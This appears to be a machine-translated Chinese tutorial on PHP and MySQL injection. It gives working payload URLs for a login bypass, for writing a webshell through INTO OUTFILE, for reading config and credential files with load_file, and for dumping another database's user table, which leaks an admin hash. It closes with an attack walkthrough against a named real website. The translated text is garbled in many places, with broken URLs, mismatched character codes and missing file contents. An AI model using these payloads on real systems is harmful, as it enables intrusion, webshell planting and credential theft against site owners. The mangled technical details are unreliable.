Php injection 44. & nbsp; md5 nightmare <br/> Dr. Wang of Shandong University recently caught a red dot in md5. let's do it too. 4. md5 nightmare
Dr. Wang of Shandong University has recently made md5 a lot better. let's do it too. we are better than him and don't need to calculate it. haha.
We can bypass md5, but not everywhere. the md5 function in php cannot be bypassed, because everything you input is in it and cannot be run. The md5 in the SQL statement can be bypassed. Of course, functions in other SQL statements can also be bypassed. The truth is the same.
Let's look at the example first:
// Login. php
......
$ Query = "select * from alphaauthor where UserName = md5 ($ username) and Password =". $ Pw ."";
......
?>
We directly submit in the browser
Http:/login. php? Username = char (1%) or 1 = 23
Import the SQL statement into select * from alphaauthor where UserName = md5 (char (97,98) or 1 = 1 #) and Password = ". $ Pw ."
Remember that md5 contains characters. because there is or 1 = 2 next to it, we randomly put a char (97,98). OK. the login is successful! Let's see, md5 is useless in front of us.
5. core technologies: use php + mysql injection to directly write data to webshell ..
Directly use the injection to get webshell, which should be very interesting to everyone. let's teach you the following.
Here we assume that you already know the physical path of the website. Here we assume that the website path is c:/apache/htdocs/site. The mysql connection information of the website is stored in/lib/SQL. inc. php.
1) applies to magic_quotes_gpc = Off
Assume that we can upload images, txt files, zip files, and other things. we can change our Trojan
Jpg suffix. the upload path is/upload/2004091201.jpg.
Content in 2004091201.jpg is
Okay. let's start http: // localhost/site/display. php? Id = 451% 20and % 201 = 2% 20% 20 union % 20 select % ,,2, load_file (C:/apache/htdocs/site/upload/2004091201.jpg, 10, 11% 20 into % 20 outfile C:/apache/htdocs/site/shell. php
Because outfile is applicable, the webpage display is abnormal, but our task is completed.
28
Let's take a look at http: // localhost/site/shell. php? Cmd = dir
29
No? Webshell is successfully created. Have you seen the first 12? That is what we output in select 1 and 2!
2) Next, let's talk about how to save webshell when magic_quotes_gpc = On. Obviously, it can also be used when magic_quotes_gpc = Off.
We can directly read the configuration file and use the method described in tip 2.
Http: // localhost/site/display. php? Id = 451% 20and % 201 = 2% 20% 20 union % 20 select % ,,2, load_file (bytes)
The SQL. inc. php content is as follows:
Now that we know the root password of mysql, we can find the background of phpmyadmin.
Http: // localhost/phpmyadmin/
Enter the root password to log on.
30
Then we create a new table structure with the following content:
#
# Data table structure 'Te'
#
Create table te (
Cmd text NOT NULL
) ENGINE = MyISAM default charset = latin1;
#
# Export the following database content 'Te'
#
Insert into te VALUES ();
OK. it's time for us to use select * from table into outfile.
Directly input in phpmyadmin SQL
SELECT * FROM 'Te' into outfile C:/apache/htdocs/site/release 1.php;
31
OK. the execution is successful. let's go to http: // localhost/site/Route 1.php? Cmd = dir. check the effect.
32
A nice webshell, right! Haha, I like it too.
I don't know if you have found that we have completed this job in the case of magic_quotes_gpc = On. In fact, you don't have to consider the restrictions of quotation marks in phpmyadmin. haha, what do you mean? It indicates that phpmyadmin is too great. this is what we are talking about when magic_quotes_gpc = On is sold!
6. if no data is found, we can still use update and insert to insert data, and then obtain our webshell. We also use the example above,
// Reg. php
......
$ Query = "insert into members
VALUES ($ id, $ login, $ pass, $ email, 2 )";
......
?>
Enter the email address
Assume that the registered id is 10.
Then we can find another place that can be injected.
Http: // localhost/site/display. php? Id = 451% 20and % 201 = 2% 20% 20 union % 20 select % ,,2, email, 10% from % 20 user % 20 where % 20id = 20 into % 20 outfile C:/apache/htdocs/site/test. php
Well, we have our wenshell again.
7. mysql cross-database query
Have you ever heard that mysql cannot be queried across databases? haha, today I am going to teach you a good way to achieve cross-database query in disguise, the method is to directly read the dat in mysql through load_file.
The file content in the folder to implement abnormal cross-database query.
For example
Before that, let's talk about the structure in the mysql data folder.
The Data folder contains folders generated by database name, and three files with the suffix frm, myd, and myi are generated by table name under the folder, for example
Mysql has the alpha database and alphaauthor and alphadb tables in the alpha database,
Alpha folder content, for example, 33
Alphadb. frm stores the data in the lphadb table, alphadb. frm stores the table structure, alphadb. the content in myi varies with the mysql version. you can use notepad to determine the content.
Lab started
Suppose we know that another database yminfo210 exists, and the table user exists. the user has the admin information.
We
Http: // localhost/site/display. php? Id = 451% 20and % 201 = 2% 20% 20 union % 20 select % ,,2, load_file (yminfo210/user. myd ),
The default directory of load_file is the data directory of mysql, so we use
Load_file (yminfo210/user. myd), of course, load_file (. info210/user. myd) is the same. Note that the default path of into outfile is in the database folder where it is located.
Result 34:
The read content
???? Admin 698d51a19d8a121ce581499d7b701668 admin@yoursite.comadmin question admin answer http://www.yoursite.com (???? KA ???? 127.0.0.1 d | ??? Aaa 3dbe00a167653a1aaee01d93e77e730e sdf@sd.com sdfasdfsdfa asdfadfasd? E? AM? A 127.0.0.1 222 222222223423
Although there are a bunch of garbled characters, we can still see that the user name is admin, the password is 698d51a19d8a121ce581499d7b701668, and the other information is later.
Through this method, we have implemented a curve cross-database, which will also be mentioned in the following example!
After talking about this, let's take a specific test. the test object is a well-known security site in China ?? Black/White Network
What do people say is there a loophole in black and white? Let's take a look.
Http://www.heibai.net/down/show.php? Id = 5403% 20and % 201 = 1
Normal display.
35
Http://www.heibai.net/down/show.php? Id = 5403% 20and % 201 = 2
The display is abnormal.
36
Okay. let's continue.
Http://www.heibai.net/down/show.php? Id = 5403% 20and % 201 = 1 union select 1
The result is as follows:
37
Note that the program name is not displayed in the figure, and
Warning: mysql_fetch_object (): supplied argument is not a valid MySQL result resource in D: \ web \ heibai \ down \ show. php on line 45
Warning: mysql_fetch_array (): supplied argument is not a valid MySQL result resource in D: \ web \ heibai \ down \ global. php on line 578
Dizzy, the website path is out, it's dead!
Let's continue until we guess
Http://www.heibai.net/down/show.php? Id = 5403% 20and % 201 = 1% 20 union % 20 select %, 19
It is displayed normally.
38
Let's convert the statement
Http://www.heibai.net/down/show.php? Id = 5403% 20and % 201 = 2% 20 union % 20 select %, 19
Show 39
Let's take a look at 12 in the introduction. we can guess it should be character type here!
OK. Let's take a look at the file content first.
D:/web/heibai/down/show. php is converted to ascii
Char (47,119,101, 58, 104,101,105, 100,111,119,110, 47,115,
104,111,119, 46,112,104,112)
We
View-source: http://www.heibai.net/down/show.php? Id = 5403% 20and % 201 = 2% 20 union % 20 select % ,,2, 3, 4, 5, 6, 7, 8, 9, 10, 11, load_file (char (47,119,101, 58, 104,101,105, 98,47, 98,97, 100,111,119,110, 47,115,104,
111,119, 46,112,104,112), 13, 14, 15, 16, 17, 18, 19
View-source: it refers to viewing the source code. as to why it is used, we will talk about it later.
Show its source code
40
Because in show. php
If we submit the file directly in the browser, the page will jump to list. php.
We found this require ("./include/config. inc. php ");
This configuration file should be placed for good. OK to continue
D:/web/heibai/down/include/config. inc. php
Convert to char (47,119,101, 104,101,105, 100,111,119,110, 47,105
, 108,117,100,101, 111,110,102,105,103, 46,105,110, 112,104,112)
We enter